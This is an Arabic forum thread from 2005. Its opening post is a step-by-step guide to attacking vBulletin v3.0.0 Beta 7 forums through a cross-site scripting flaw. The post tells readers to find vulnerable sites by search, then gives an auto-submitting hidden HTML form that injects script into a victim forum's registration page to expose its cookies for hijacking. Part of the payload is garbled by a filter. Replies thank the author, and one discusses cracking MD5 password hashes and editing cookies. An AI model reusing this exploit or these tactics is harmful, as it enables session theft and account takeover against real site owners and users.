للتسجيل
 
 

العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
ريوف يوم أمس 04:49 PM
ابوحور المنتدى بأحسن حال انا فيه 24 ساعه عزيز النفس ظيفي انت اليوم في مجلس رويوف

ابـــوحـــــور 03-Jul-2008 08:42 PM
اخواني اهديلك سلامي من الكويت واشتقنالكم ليش المنتدى ناااااااايم

بقايا انسان 03-Jul-2008 07:18 AM
أجــامل الصبر والايــام تعصاني _ _ بالله قلي وش اللي معجبك فيني

دلوعة زماني 02-Jul-2008 07:14 PM
مساكم الله بالخير يأحلى منتدى فديتكم عضو عضو _منور المنتدى بالبرنس وحلاوي منورين يالغلاااا

ريوف 02-Jul-2008 08:23 AM
انا اليوم من نفسي زعلانه تبكي اليوم افراق غاليها


إضافة رد
 
أدوات الموضوع إبحث في الموضوع
  #1  
قديم 19-Mar-2005, 05:23 PM
islamm2003 islamm2003 غير متصل
عـضـو جديد
 
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
ثغرة فى منتديات vb

بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7



----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html



كود:


كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------

مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه



احفظ الملف بمتداد html


------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان



الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php

تحياتي
رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:19 AM
الصورة الرمزية الدويله
الدويله الدويله غير متصل
[ مـتـمـيـز ]
 
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 424
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد
رد مع اقتباس
  #3  
قديم 13-Apr-2005, 04:19 PM
ابو سارة ابو سارة غير متصل
مشرف المنتديات العامه
 
تاريخ التسجيل: Apr 2005
العمر: 29
المشاركات: 177
مشاركة: ثغرة فى منتديات vb

islamm2003


يعطيك العافيه اخوي وماقصرت

ومجهود رائع
__________________
[poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"]
من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري
والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري
ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem]
رد مع اقتباس
  #4  
قديم 20-Apr-2005, 03:13 PM
الخـارج عن القـانون الخـارج عن القـانون غير متصل
عـضـو مـاسـي
 
تاريخ التسجيل: Apr 2005
الدولة: تورا بورا
العمر: 28
المشاركات: 148
مشاركة: ثغرة فى منتديات vb

اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :)
رد مع اقتباس
إضافة رد


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd موقع
--:: تصميم عبادى نت للتصميم والإستضافة ::--
الحقوق محفوظة

SEO by bdr130.net 3.0.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60